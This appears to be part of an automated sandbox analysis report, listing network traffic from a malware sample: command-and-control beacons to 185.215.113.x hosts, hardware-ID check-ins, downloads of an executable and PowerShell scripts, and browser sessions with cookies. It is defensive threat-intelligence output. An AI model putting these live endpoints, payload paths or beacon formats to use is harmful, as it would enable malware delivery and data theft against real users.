Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 36 37 37 35 38 35 34 36 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="hwid"9567758546661964116302------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="build"save------KEHJKJDGCGDAKFHIDBGC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 36 37 37 35 38 35 34 36 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="hwid"9567758546661964116302------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build"save------IIEBGIDAAFHIJJJJEGCG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 185.215.113.103:80
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D8BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 8_2_00D8BE30
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FzTot36CsvZZWwK&MD=aUVBR8F3 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FzTot36CsvZZWwK&MD=aUVBR8F3 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/1.1Host: youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIpbbJAQipncoBCMeVywEIlqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/1.1Host: www.youtube.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIpbbJAQipncoBCMeVywEIlqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=8eeyt93UQAA
Source: global traffic HTTP traffic detected: GET /crx/blobs/AY4GWKCjSWa8TD5HR0ssoNSHmv1DlGbxavvv4f4_vreCQV6o4JdgbhTns13WqVLfraA3idGD1YqVFdL1d29hUkKmBRQxeBB8OW5ZEZvDIDLLC0_H7OAK-03clOTMdE15SKgAxlKa5Za-otUDEb42n7phqLA20ygc_Y63/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_9_1_1.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/1.1Host: youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIpbbJAQipncoBCMeVywEIlqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=8eeyt93UQAA; GPS=1; VISITOR_INFO1_LIVE=YyP4m5SjozE; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJg%3D%3D
Source: global traffic HTTP traffic detected: GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/1.1Host: www.youtube.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIpbbJAQipncoBCMeVywEIlqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=8eeyt93UQAA; GPS=1; VISITOR_INFO1_LIVE=YyP4m5SjozE; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJg%3D%3D
Source: global traffic HTTP traffic detected: GET /webstore/inlineinstall/detail/efaidnbmnnnibpcajpcglclefindmkaj HTTP/1.1Host: chrome.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1940882779&timestamp=1727564560082 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIpbbJAQipncoBCMeVywEIlqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-2097603244&timestamp=1727564560305 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIpbbJAQipncoBCMeVywEIlqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIpbbJAQipncoBCMeVywEIlqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=pGvgU9m2cL1RRs7BfZ3bB0EsafGiNQdduEUb5Gw00w6MF1INqfeOvAORFJ_hTW7r4LPqS_04bQEDiS7m-YhQ5Uah-HMGHW-N38nGORIMuXBUJ0HHdmT9t3Oe9iaAfRHvFr-aJZdJCNmJ5Z3coJsNxx_GOITPPKLBHQsW3kJENmsAPOCGQQ
Source: global traffic HTTP traffic detected: GET /crx/blobs/AY4GWKDHKllS27BO_e8bCnbax_jg8ytdTG4Uzua5Kte91Msonmjt9Ssh1u4j53F3UYy-997sHknkzKEy9994XId3zBBDiju_YSunzv5QYwyL8XEx9VuF26n3JIgkmCYaLzIAxlKa5UdUDZoPCHdwU63c7rFT0JUxfsWG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_82_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Sat, 28 Sep 2024 22:56:39 GMTIf-None-Match: "1c2200-62335e26d596b"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/ko.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/so.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Sat, 28 Sep 2024 22:56:39 GMTIf-None-Match: "1c2200-62335e26d596b"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
